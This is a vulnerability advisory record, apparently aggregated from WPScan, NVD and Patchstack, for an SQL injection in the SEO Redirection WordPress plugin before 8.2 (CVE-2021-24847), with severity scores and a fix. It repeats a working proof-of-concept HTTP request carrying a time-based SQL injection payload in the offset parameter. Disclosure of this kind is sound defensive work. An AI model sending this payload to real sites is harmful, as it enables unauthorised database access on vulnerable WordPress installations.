ID WPVDB-ID:679CA6ED-2343-43F3-9C3E-2C12E12407C1
Type wpvulndb
Reporter JrXnm
Modified 2021-11-07T08:48:22
Description
The importFromRedirection AJAX action of the plugin, available to any authenticated user, does not properly sanitise the offset parameter before using it in a SQL statement, leading an SQL injection when the redirection plugin is also installed
PoC
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/ ;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [any authenticated user] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 126 action=importFromRedirection&offset;=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(20000000,sha1(1))),0x20),1)--+-
{"id": "WPVDB-ID:679CA6ED-2343-43F3-9C3E-2C12E12407C1", "vendorId": null, "type": "wpvulndb", "bulletinFamily": "software", "title": "SEO Redirection < 8.2 - Subscriber+ SQL Injection", "description": "The importFromRedirection AJAX action of the plugin, available to any authenticated user, does not properly sanitise the offset parameter before using it in a SQL statement, leading an SQL injection when the redirection plugin is also installed\n\n### PoC\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [any authenticated user] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 126 action=importFromRedirection&offset;=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(20000000,sha1(1))),0x20),1)--+-\n", "published": "2021-10-18T00:00:00", "modified": "2021-11-07T08:48:22", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://wpscan.com/vulnerability/679ca6ed-2343-43f3-9c3e-2c12e12407c1", "reporter": "JrXnm", "references": [], "cvelist": ["CVE-2021-24847"], "immutableFields": [], "lastseen": "2021-11-26T19:14:06", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24847"]}, {"type": "wpexploit", "idList": ["WPEX-ID:679CA6ED-2343-43F3-9C3E-2C12E12407C1"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24847"]}, {"type": "wpexploit", "idList": ["WPEX-ID:679CA6ED-2343-43F3-9C3E-2C12E12407C1"]}]}, "exploitation": null, "vulnersScore": 5.2}, "affectedSoftware": [{"version": "8.2", "operator": "lt", "name": "seo-redirection"}], "exploit": "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nCookie: [any authenticated user]\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 126\r\n\r\naction=importFromRedirection&offset=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(20000000,sha1(1))),0x20),1)--+-", "sourceData": "", "generation": 0, "_state": {"dependencies": 1646176031}}
{"wpexploit": [{"lastseen": "2021-11-26T19:14:06", "description": "The importFromRedirection AJAX action of the plugin, available to any authenticated user, does not properly sanitise the offset parameter before using it in a SQL statement, leading an SQL injection when the redirection plugin is also installed\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "wpexploit", "title": "SEO Redirection < 8.2 - Subscriber+ SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24847"], "modified": "2021-11-07T08:48:22", "id": "WPEX-ID:679CA6ED-2343-43F3-9C3E-2C12E12407C1", "href": "", "sourceData": "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nCookie: [any authenticated user]\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 126\r\n\r\naction=importFromRedirection&offset=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(20000000,sha1(1))),0x20),1)--+-", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T15:04:30", "description": "The importFromRedirection AJAX action of the SEO Redirection Plugin \u00e2\u20ac\u201c 301 Redirect Manager WordPress plugin before 8.2, available to any authenticated user, does not properly sanitise the offset parameter before using it in a SQL statement, leading an SQL injection when the redirection plugin is also installed", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T11:15:00", "type": "cve", "title": "CVE-2021-24847", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24847"], "modified": "2021-11-18T21:07:00", "cpe": [], "id": "CVE-2021-24847", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24847", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-04-20T19:39:49", "description": "SQL Injection (SQLi) vulnerability discovered by JrXnm in WordPress SEO Redirection plugin (versions <= 8.1).\n\n## Solution\n\nUpdate the WordPress SEO Redirection plugin to the latest available version (at least 8.2).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "patchstack", "title": "WordPress SEO Redirection plugin <= 8.1 - SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24847"], "modified": "2021-10-18T00:00:00", "id": "PATCHSTACK:7535997537CA99EA59C15D705698BFD8", "href": "https://patchstack.com/database/vulnerability/seo-redirection/wordpress-seo-redirection-plugin-8-1-sql-injection-sqli-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}